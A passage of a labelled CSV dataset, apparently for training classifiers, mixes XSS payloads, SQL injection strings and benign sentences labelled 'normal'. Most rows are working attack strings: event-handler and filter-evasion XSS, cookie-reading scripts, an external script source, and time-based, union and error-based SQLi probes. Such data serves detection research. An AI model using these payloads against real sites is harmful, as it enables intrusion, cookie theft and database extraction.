onmouseover=""alert(1)"">test</blink>",1,XSS,7380 "`>ABC<div style=font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';"">DEF",1,XSS,2012 "Simply select modules from the library and connect them to interactively read and visualize data for analysis, presentation and publication.",3,normal,25551 -3136%' ) or 3400 = 6002,2,SQLi,21231 "1 ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11330 """)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,19935 "-8819"" ) where 9119 = 9119 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10214 1'+ ( select kzgg where 5070 = 5070,2,SQLi,20087 Modify account.,3,normal,23033 "1"" ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17020 "<a href=""&#106;avascript:alert(1)"">XSS</a><a href=""&#106avascript:alert(1)"">XSS</a>",1,XSS,1904 "1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""qqfd"" like ""qqfd",2,SQLi,10305 "On the principle that as a rule like begets like, it has been the practice to select as sires the best public performers on the turf, and of two horses of like blood it is sound sense to choose the better as against the inferior public performer.",3,normal,25842 "{""id"":null,""name"":""Bibarel""}",3,normal,26914 "<optgroup oncopy=""alert(1)"" contenteditable>test</optgroup>",1,XSS,3761 "{""id"":null,""firstName"":""Ng"",""lastName"":""Menglay"",""address"":""105 Amity Way, Wayne PA 19087"",""city"":""502"",""telephone"":""5900613668""}",3,normal,27448 <basefont onpointerdown=alert(1)>XSS</basefont>,1,XSS,6251 "<multicol onmouseover=""alert(1)"">test</multicol>",1,XSS,6049 "{""id"":null,""firstName"":""Isaiah"",""lastName"":""Toh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27562 "<details onbeforepaste=""alert(1)"" contenteditable>test</details>",1,XSS,2959 Select a painting style to explore.,3,normal,24036 Select reject.,3,normal,24582 1 ) as vqbf where 4020 = 4020,2,SQLi,20710 "-8382"" ) ) order by 1--",2,SQLi,21306 "1"" ) and 4595 = 4595#",2,SQLi,21688 <td id=x tabindex=1 onfocusin=alert(1)></td>,1,XSS,6910 javascript:alert('');,1,XSS,9754 "-7714 where 9768 = 9768 union all select 9768,9768--",2,SQLi,18200 Amazon is offering up to 1033% off select Twitch Clothing & Accessories.,3,normal,26383 Please select from the categories on the left sidebar to see the relevant links.,3,normal,25777 "select * from users where id = 1 union select +!<1,version ( ) -- 1",2,SQLi,16465 &<script>document.vulnerable=true;</script>,1,XSS,7081 <rp onpointerdown=alert(1)>XSS</rp>,1,XSS,9117 "1'+ ( select inyd where 1668 = 1668 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) ) +'",2,SQLi,12097 "<style>:target {color:red;}</style><acronym id=x style=""transition:color 1s"" ontransitionend=alert(1)></acronym>",1,XSS,946 "1%"" ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ""%"" = """,2,SQLi,11039 select * from users where id = 1 +$ . or 1 = 1 -- 1,2,SQLi,18263 1'+ ( select 'hcqf' where 9956 = 9956 and ( 2993 = 4297 ) *4297 ) +',2,SQLi,16382 <svg><audio onload=alert(1)></audio>,1,XSS,8893 "1 where 5485 = 5485 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11219 1'+ ( select gblp where 6768 = 6768,2,SQLi,20088 -6215' ) or ( 8459 = 8459 ) *4906,2,SQLi,20207 "On returning to South Africa after the Raid inquiry at Westminster in 1897, ' In his evidence before the House of Commons Select Committee which inquired into the Raid, Rhodes did not object to the continued existence of the republic "" for local matters,"" but desired a federal South Africa under the British flag; see Blue Book (165) 1897 p. 21; also Sir Lewis Michell's Life of Rhodes, vol.",3,normal,25849 select ( case when ( 5768 = 9169 ) then 5768 else 1/ ( select 0 ) end ) --,2,SQLi,15742 "<noscript onmousedown=""alert(1)"">test</noscript>",1,XSS,5979 "1 where 7051 = 7051 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11544 "1' ) ) as fwxq where 9935 = 9935 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11854 "window['a'+'l'+'e'+'r'+'t'].call(this,1)",1,XSS,8065 Car owners download the free app and select preferred charging times.,3,normal,26297 Choose fields where necessary.,3,normal,23344 "document.querySelector("""")",1,XSS,9677 <scrscriptipt>alert(1)</scrscriptipt>,1,XSS,8562 Chu would select the next clue.,3,normal,26288 "-7448 union all select 4072,4072#",2,SQLi,20208 "{""id"":null,""name"":""direct class""}",3,normal,27175 <img src=x onerror=alert('XSS');>,1,XSS,9399 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and '%' = '",2,SQLi,15092 "<style>:target {color: red;}</style><ul id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></ul>",1,XSS,1154 "-3364%"" ) ) ) union all select 5464--",2,SQLi,19812 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( ""%"" = """,2,SQLi,13810 "<xml id=""X""><a><b><script>document.vulnerable=true;</script>;</b></a></xml>",1,XSS,2220 "1"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""oyxk"" = ""oyxk",2,SQLi,10951 "<strike onpaste=""alert(1)"" contenteditable>test</strike>",1,XSS,4315 “><s”%2b”cript>alert(document.cookie)</script>,1,XSS,6276 Was there a period where we wanted to select dialogue choices?,3,normal,25182 "< STYLE="":expression(alert(''))"">",1,XSS,9355 1 ) waitfor delay '0:0:5',2,SQLi,21153 "Its companion volume of Select Charters and other Illustrations of English Constitutional History, admirable in itself, has a special importance in that its plan has been imitated with good results both in England and the United States.",3,normal,25946 "-6971"" or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""ifuh"" like ""ifuh",2,SQLi,10228 "1%"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""%"" = """,2,SQLi,10831 "<IMG SRC=\""jav&#x0A;ascript:alert('XSS');\"">",1,XSS,6790 <dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus>,1,XSS,2476 "<img\x13src=x onerror=""javascript:alert(1)"">",1,XSS,6768 "<element onbeforepaste=""alert(1)"" contenteditable>test</element>",1,XSS,2947 "<th onmouseup=""alert(1)"">test</th>",1,XSS,9288 <hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus>,1,XSS,3190 "<figcaption onmouseup=""alert(1)"">test</figcaption>",1,XSS,5565 1%' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and '%' = ',2,SQLi,15034 1' in boolean mode ) and 4457 = 3885#,2,SQLi,19905 "admin"" or 1=1",2,SQLi,22217 Select your project.,3,normal,24853 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></header>",1,XSS,186 "-5143'+ ( select 'zyrr' where 8405 = 8405 union all select 8405,8405,8405,8405#",2,SQLi,15298 -5152' ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'jumr' like 'jumr,2,SQLi,10098 "-7236 or make_set ( 9618 = 6919,6919 )",2,SQLi,19770 "<style>:target {color:red;}</style><i id=x style=""transition:color 1s"" ontransitionend=alert(1)></i>",1,XSS,1442 ") AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,19946 ` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,16125 1' where 4473 = 4473 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,15514 "1"" rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) )",2,SQLi,16204 "{""id"":null,""name"":""everything""}",3,normal,27590 1'+ ( select gthp where 7311 = 7311 or sleep ( 5 ) #,2,SQLi,18188 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( 'fegp' = 'fegp",2,SQLi,16241 "1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) )",2,SQLi,17978 Select fall.,3,normal,24676 "<IMG STYLE=""xss:expr/*XSS*/ession(javascript:alert(1))"">",1,XSS,4212 left,3,normal,23121 -7610' or 3038 = 3038,2,SQLi,21620 "<rtc onmouseup=""alert(1)"">test</rtc>",1,XSS,8787 "Destined originally for the Church, he had preferred to become a knight, and in forty years of tournaments and fights he had won himself a considerable reputation, when in 1208 envoys came from the Holy Land to ask Philip Augustus, king of France, to select one of his barons as husband to the heiress, and ruler of the kingdom, of Jerusalem.",3,normal,26245 "1"" ) ) union all select null,null,null,null,null#",2,SQLi,18597 "<li onpaste=""alert(1)"" contenteditable>test</li>",1,XSS,6020 "1 where 5081 = 5081 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11881 "<style>:target {color:red;}</style><select id=x style=""transition:color 1s"" ontransitionend=alert(1)></select>",1,XSS,1030 "select * from users where id = 1 or ""\#"" or 1 = 1 -- 1",2,SQLi,17942 "<meta onmouseup=""alert(1)"">test</meta>",1,XSS,8466 "<section onkeyup=""alert(1)"" contenteditable>test</section>",1,XSS,3927 "1"" ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""vjvz"" like ""vjvz",2,SQLi,11378 <ruby id=x tabindex=1 onactivate=alert(1)></ruby>,1,XSS,5779 Save 25% off select Certified Refurbished Philips Hue Smart Bulb Kits,3,normal,25733 "<td onmouseleave=""alert(1)"">test</td>",1,XSS,8733 Sort the scattered books.,3,normal,22582 <strike id=x tabindex=1 onfocus=alert(1)></strike>,1,XSS,5564 1'+ ( select idnb where 2338 = 2338,2,SQLi,20079 "<body onPropertyChange body onPropertyChange=""javascript:javascript:alert(1)""></body onPropertyChange>",1,XSS,1362 "<dl onpaste=""alert(1)"" contenteditable>test</dl>",1,XSS,5952 <button onRedo=javascript:alert(1)>,1,XSS,9146 "1"" ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( ""xtyt"" = ""xtyt",2,SQLi,12546 The teacher or teachers need to select the key words or phrases they want the pupils to choose from.,3,normal,25371 "<bdi draggable=""true"" ondragend=""alert(1)"">test</bdi>",1,XSS,4907 "<shadow onmouseleave=""alert(1)"">test</shadow>",1,XSS,6659 "{""id"":null,""firstName"":""Taufiq"",""lastName"":""Rahman"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27509 X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >,1,XSS,2343 "AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,20129 "<style>@keyframes x{}</style><sub style=""animation-name:x"" onanimationstart=""alert(1)""></sub>",1,XSS,1665 Select a flavor for the coffee.,3,normal,24118 Select your favorite food.,3,normal,24325 1 ) ) as foul where 4361 = 4361 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10526 "<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>",1,XSS,530 "-4728"" ) ) as ndri where 3278 = 3278 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,15991 <acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus>,1,XSS,2371 1' in boolean mode ) and 2006 = 2006,2,SQLi,19972 "1' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'vwtq' = 'vwtq",2,SQLi,11671 <A href=javas%26#99;ript:alert(1)>click,1,XSS,8290 "1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,13436 1' ) ) ) and ( 1685 = 2985 ) *2985 and ( ( ( 'rzwb' = 'rzwb,2,SQLi,17248 <caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus>,1,XSS,2633 "1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'nelb' = 'nelb",2,SQLi,11250 "<rb oncontextmenu=""alert(1)"">test</rb>",1,XSS,8343 <html ontouchstart=alert(1)>,1,XSS,9635 Our lumber purchasers visit the sawmills several times a year to select the highest quality lumber for your Rainbow Play System.,3,normal,25803 1'|| ( select 'ozoj' where 1608 = 1608,2,SQLi,19707 Select shoot.,3,normal,24670 "-2149"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( ""hoon"" like ""hoon",2,SQLi,16437 "<style>@keyframes slidein {}</style><plaintext style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></plaintext>",1,XSS,305 "<tbody draggable=""true"" ondragend=""alert(1)"">test</tbody>",1,XSS,4164 1'|| ( select 'etvo' from dual where 1557 = 1557,2,SQLi,18685 "javascript:alert()//'//""//\""//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()>",1,XSS,327 "1' ) ) as ticp where 9794 = 9794 union all select null,null,null,null,null,null,null,null--",2,SQLi,14644 <head id=x tabindex=1 onbeforeactivate=alert(1)></head>,1,XSS,4538 <time id=x tabindex=1 onbeforeactivate=alert(1)></time>,1,XSS,4599 or sleep ( __TIME__ ) #,2,SQLi,21278 "<style>@keyframes x{}</style><dialog style=""animation-name:x"" onanimationstart=""alert(1)""></dialog>",1,XSS,1489 "1 ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,16089 ) or ('x')=('x,2,SQLi,22180 "<style>@keyframes slidein {}</style><i style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></i>",1,XSS,467 "<s onmouseup=""alert(1)"">test</s>",1,XSS,9473 "getURL(""javascript:alert('XSS')"")",1,XSS,9392 "The Industrial Select Sector SPDR Fund ETF is up 5 percent from Tuesday's close through Friday, while the Financial Select Sector SPDR Fund ETF rose 8 percent.",3,normal,25430 "On the upper agora we use signposts the user can select to start a tour to the most important "" sights "" .",3,normal,25840 "<video onerror=""javascript:javascript:alert(1)""><source>",1,XSS,4211 Filter junk.,3,normal,23060 "<image onmousedown=""alert(1)"">test</image>",1,XSS,7425 "1"" where 4688 = 4688 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,15793 "<nobr draggable=""true"" ondrag=""alert(1)"">test</nobr>",1,XSS,5125 "1' ) and elt ( 4249 = 4249,7259 )",2,SQLi,20195 "1"" ) order by 1--",2,SQLi,22095 "select * from users where id = 1 or 1#"", union select 'a',version ( ) -- 1",2,SQLi,15696 Randomly select a meal.,3,normal,24442 Can't select that.,3,normal,24425 (sleep(5))--,2,SQLi,22332 "<style>@keyframes slidein {}</style><strong style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></strong>",1,XSS,358 "1%' ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( '%' = '",2,SQLi,10747 Where's the post office?,3,normal,23506 "-6599%"" ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ""%"" = """,2,SQLi,17152 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--",2,SQLi,14950 "1' ) ) as bsvk where 5985 = 5985 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12219 1 ) as ratg where 3033 = 3033 union all select null--,2,SQLi,18077 "META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('')</SCRIPT>"">",1,XSS,2322 Where's the missing link?,3,normal,22712 "<a href=""\xE2\x80\x87javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2021 Select your ideal location.,3,normal,24477 "admin"") or ""1""=""1""/*",2,SQLi,21721 "<style>:target {transform: rotate(180deg);}</style><picture id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></picture>",1,XSS,569 asin,3,normal,23220 "-8301' ) union all select 1806,1806--",2,SQLi,19910 <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>,1,XSS,3512 "1' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'dkra' like 'dkra",2,SQLi,12327 To display the raster you have opened select ' Raster ' from the ' Display ' menu.,3,normal,25280 "<sup onbeforecopy=""alert(1)"" contenteditable>test</sup>",1,XSS,4488 "select * from users where id = 1 union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14428 if ( 6745 = 4078 ) select 6745 else drop function ytyt--,2,SQLi,17645 &lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,1947 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( '%' = '",2,SQLi,13385 "{""id"":null,""firstName"":""Toh"",""lastName"":""Munsing"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26823 "{""id"":null,""name"":""pony""}",3,normal,27420 "<style onmousemove=""alert(1)"">test</style>",1,XSS,7490 "{""id"":null,""name"":""Affenpinscher""}",3,normal,27139 He deleted the old posts.,3,normal,23007 "<q onkeypress=""alert(1)"" contenteditable>test</q>",1,XSS,5809 <dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus>,1,XSS,2572 "<dir onmouseup=""alert(1)"">test</dir>",1,XSS,8917 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",2,SQLi,15827 "<aside oncopy=""alert(1)"" contenteditable>test</aside>",1,XSS,5010 "1"" ) and 2954 = 1256--",2,SQLi,21485 "<a href=""java&NewLine;script:alert(1)"">XSS</a>",1,XSS,6265 "1 ) ) as debc where 7428 = 7428 union all select null,null,null#",2,SQLi,16768 <meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus>,1,XSS,2308 "1' where 8360 = 8360 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13266 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,11302 "select count ( * ) from generate_series ( 1,5000000 ) # fnck",2,SQLi,17191 "1 ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13550 1' where 8231 = 8231,2,SQLi,21841 Select a travel destination to visit.,3,normal,24077 Affiliated groups may select two members to vote at annual general meetings.,3,normal,26407 Select your dream vacation.,3,normal,24271 "1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11826 <label onpointermove=alert(1)>XSS</label>,1,XSS,7765 "<spacer draggable=""true"" ondragstart=""alert(1)"">test</spacer>",1,XSS,3285 "1"" or sleep ( 5 ) #",2,SQLi,22010 "<div draggable=""true"" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg>",1,XSS,1140 "{""id"":null,""firstName"":""Kelvin Lee"",""lastName"":""Lee"",""address"":""41 N 4TH ST, ALLENTOWN PA 18102"",""city"":""899"",""telephone"":""2845758434""}",3,normal,27478 <tr id=x tabindex=1 onactivate=alert(1)></tr>,1,XSS,6577 "1' ) ) as orvy where 7270 = 7270 union all select null,null,null,null,null,null,null,null#",2,SQLi,14681 <script>onerror=alert;throw 1</script>,1,XSS,8305 Search records where valid.,3,normal,23315 "1' ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 'ekla' = 'ekla",2,SQLi,12590 <svg><script>&#97;lert(1)</script></svg>,1,XSS,7806 "-9684"" order by 1#",2,SQLi,22069 "1"" ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( ""cwpt"" like ""cwpt",2,SQLi,12031 <input type=radio id=x onfocusin=alert(1)>,1,XSS,7517 "<sub oncontextmenu=""alert(1)"">test</sub>",1,XSS,7959 1' ) as zmvn where 2887 = 2887 union all select null--,2,SQLi,18018 1 where 9752 = 9752,2,SQLi,21997 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></details>",1,XSS,160 -7770' where 6503 = 6503 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10668 Where's the symphony?,3,normal,23588 "1 ) ) as uizx where 2512 = 2512 and make_set ( 1402 = 2908,2908 ) --",2,SQLi,16391 "{""id"":null,""name"":""snow""}",3,normal,27004 "javascript://--></title></style></textarea></script><svg ""//' onclick=alert()//",1,XSS,2062 "<div draggable=""true"" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable>drop here</dialog>",1,XSS,883 1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'ywbs' = 'ywbs,2,SQLi,14087 "1"" or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ""utzr"" like ""utzr",2,SQLi,11523 Where's the nearest park?,3,normal,23498 "1"" ) ) as bosq where 4695 = 4695",2,SQLi,20306 "<dl draggable=""true"" ondragleave=""alert(1)"">test</dl>",1,XSS,4961 <select autofocus onfocus=alert(1)>//INJECTX,1,XSS,7053 "<dir draggable=""true"" ondragend=""alert(1)"">test</dir>",1,XSS,4885 "-8966"" ) ) ) or 1628 = 2712",2,SQLi,20930 "-7725%' ) ) union all select 4559,4559,4559,4559,4559,4559,4559,4559,4559--",2,SQLi,15680 onclick=prompt(8)><svg/onload=prompt(8)>@x.y,1,XSS,6765 "<acronym ondblclick=""alert(1)"">test</acronym>",1,XSS,6618 "-1083' ) union all select 9993,9993,9993,9993,9993,9993,9993,9993,9993--",2,SQLi,15955 "<dfn onbeforecut=""alert(1)"" contenteditable>test</dfn>",1,XSS,4804 Select the correct answer from the options.,3,normal,24048 "select pg_sleep ( 5 ) and ( ( ""byhx"" like ""byhx",2,SQLi,18879 "<header oncontextmenu=""alert(1)"">test</header>",1,XSS,6301 <param id=x tabindex=1 onbeforeactivate=alert(1)></param>,1,XSS,4181 Select the right solution for the challenge.,3,normal,24225 "<p onpaste=""alert(1)"" contenteditable>test</p>",1,XSS,6507 "<li onmouseenter=""alert(1)"">test</li>",1,XSS,8603 1' ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,17476 The whitelisted version will be an option parents can select.,3,normal,25361 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#",2,SQLi,11543 "<embed ondblclick=""alert(1)"">test</embed>",1,XSS,7752 <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>,1,XSS,2060 ") or (x"")=(""x",2,SQLi,22214 "1"" where 8635 = 8635 and 4595 = 4595#",2,SQLi,19889 <svg><small onload=alert(1)></small>,1,XSS,8853 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 'fuyl' = 'fuyl",2,SQLi,13314 Sort the cables.,3,normal,22786 <img/src=`` onerror=this.onerror=confirm(1),1,XSS,7078 "-7032' ) as xmmm where 5635 = 5635 union all select 5635,5635,5635,5635,5635--",2,SQLi,15344 admin' ) or '1' = '1,2,SQLi,21740 "</ foo=""><script>alert(91)</script>"">",1,XSS,8739 <bgsound onpointerleave=alert(1)>XSS</bgsound>,1,XSS,6341 AND 1 = utl_inaddr.get_host_address ( ( SELECT host_name FROM v$instance ) ) AND 'i' = 'i,2,SQLi,14714 Locate items where required.,3,normal,23309 "<SCRIPT ""a='>'"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,5823 <bdi onpointerover=alert(1)>XSS</bdi>,1,XSS,8622 "<strike oncut=""alert(1)"" contenteditable>test</strike>",1,XSS,4718 select pg_sleep ( 5 ) and ( ( ( 'qslr' = 'qslr,2,SQLi,18933 "&lt;A HREF=\""htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\""&gt;XSS&lt;/A&gt;",1,XSS,2217 <nextid onpointerleave=alert(1)>XSS</nextid>,1,XSS,6997 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( 'pnst' = 'pnst",2,SQLi,13626 "1"" ) and ( 4085 = 4885 ) *4885 and ( ""sxte"" = ""sxte",2,SQLi,18371 "1' or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11261 -alert(1)//,1,XSS,9842 "<style>@keyframes x{}</style><footer style=""animation-name:x"" onanimationstart=""alert(1)""></footer>",1,XSS,1484 -9742 ) where 8409 = 8409 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10551 Sort alphabet.,3,normal,23018 "1 or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,19575 "1%"" ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) 